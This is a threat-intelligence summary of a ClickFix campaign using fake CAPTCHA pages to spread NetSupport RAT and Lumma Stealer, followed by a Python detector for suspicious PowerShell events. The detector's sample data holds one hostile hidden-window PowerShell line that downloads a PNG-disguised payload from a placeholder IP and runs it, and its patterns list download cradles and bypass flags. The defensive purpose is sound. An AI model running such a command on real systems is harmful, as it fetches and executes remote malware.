Full Report
Threat actors have been observed using the increasingly common ClickFix technique to deliver a remote access trojan named NetSupport RAT since early January 2025. NetSupport RAT, typically propagated via bogus websites and fake browser updates, grants attackers full control over the victim's host, allowing them to monitor the device's screen in real-time, control the keyboard and mouse, upload and download
Analysis Summary
# Threat Actor: Undetermined Actor Utilizing ClickFix Technique
## Attribution & Identity
No specific threat actor name or attribution is provided in the article. The activity is attributed to threat actors who have adopted the "ClickFix technique" for initial access.
## Activity Summary
Threat actors have been observed exploiting the "ClickFix technique" since early January 2025 to deploy the NetSupport Remote Access Trojan (RAT). The ClickFix technique involves injecting a fake CAPTCHA webpage onto compromised websites, directing users to copy and execute malicious PowerShell commands to download and run malware payloads. This campaign is also noted to be using the ClickFix approach to propagate an updated version of Lumma Stealer malware.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Use of the "ClickFix technique" where a fake CAPTCHA page instructs users to execute PowerShell commands.
- **Payload Delivery:** PowerShell commands are used to download and execute the NetSupport RAT client from a remote server.
- **Obfuscation/Evasion (Lumma Stealer context):** The updated Lumma Stealer version uses the ChaCha20 cipher for decrypting configuration files containing C2 server lists, demonstrating active effort to circumvent analysis tools.
- **Malware Used:** NetSupport RAT (originally legitimate remote IT support program, repurposed for malicious activity) and Lumma Stealer.
## Targeting
- **Sectors:** Not explicitly listed, but the use of RATs and stealers implies targeting organizational environments where sensitive information is present.
- **Geography:** Not specified.
- **Victims:** Organizations in general, as the goal is to capture sensitive information.
## Tools & Infrastructure
- **Malware families used:** NetSupport RAT, Lumma Stealer (updated version using ChaCha20).
- **Infrastructure (C2, domains, IPs - defang URLs):**
  - Payloads (NetSupport RAT client components) are hosted on a remote server, delivered in the form of PNG image files.
  - C2 servers for Lumma Stealer are contained within a configuration file decrypted using ChaCha20.
## Implications
The adoption of the ClickFix methodology shows threat actors relying on social engineering, combined with compromised websites, to get users to execute commands themselves via deceptive prompts (fake CAPTCHAs). The successful deployment of a tool as capable as NetSupport RAT indicates a likely objective of persistent remote access, monitoring, and data exfiltration. Malware updates such as the encryption change in Lumma Stealer highlight an ongoing effort by malware developers to maintain operational security and evade signature-based and behavioral detection.
## Mitigations
- Educate users about unsolicited instructions on compromised websites, especially those prompting the execution of PowerShell commands via fake CAPTCHAs or similar overlays.
- Implement strict endpoint-based controls to restrict or monitor the execution of potentially malicious PowerShell commands.
- Employ network monitoring solutions to detect connections to known malicious infrastructure or unusual C2 beaconing associated with NetSupport RAT or Lumma Stealer.
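One way to act on the endpoint-monitoring mitigation above is to score PowerShell process-creation events for the combination this campaign relies on: a download cradle, a remote URL, a payload served as a PNG image, and window-hiding or policy-bypass flags. This is an added example, not code from the report or from any vendor; the event records, hostnames and IP addresses are constructed for the demo and the scoring weights and threshold are assumptions to be tuned against local telemetry.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 fields, simplified).
# These are made-up records for the demo, not telemetry from the campaign.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "iwr http://203.0.113.7/img/client.png -OutFile $env:TEMP\client.png; Start-Process $env:TEMP\client.png"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -c "Invoke-WebRequest https://updates.example.invalid/agent.msi -OutFile C:\temp\agent.msi"'},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r"chrome.exe https://example.invalid/img/logo.png"},
]

# Signals that together characterise a ClickFix-style cradle: user-pasted PowerShell fetches a
# remote resource (here disguised as a PNG) and runs it, often with a hidden window.
DOWNLOAD_CRADLE = re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|start-bitstransfer)\b", re.I)
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.I)
EVASIVE_FLAG = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|ep\s+bypass|executionpolicy\s+bypass|enc(?:odedcommand)?)\b", re.I)

def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event; non-PowerShell images score 0."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    cmd, score, reasons = event["cmdline"], 0, []
    if DOWNLOAD_CRADLE.search(cmd):
        score += 2; reasons.append("download cradle")
    urls = REMOTE_URL.findall(cmd)
    if urls:
        score += 1; reasons.append(f"remote URL {urls[0]}")
        if urls[0].lower().endswith(".png"):  # executable content served as an image file
            score += 1; reasons.append("payload disguised as PNG")
    if EVASIVE_FLAG.search(cmd):
        score += 1; reasons.append("hidden window / policy bypass flag")
    return score, reasons

def find_clickfix_candidates(events: list[dict], threshold: int = 4) -> list[tuple[int, int, list[str]]]:
    """Return (index, score, reasons) for events at or above the threshold, for analyst review."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits

if __name__ == "__main__":
    for i, score, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"event {i}: score {score}: {', '.join(reasons)}")
```

With the assumed threshold of 4, the legitimate update script in the third record (a plain download of an .msi, no hidden window) scores 3 and is not flagged, while the PNG-disguised hidden-window cradle scores 5.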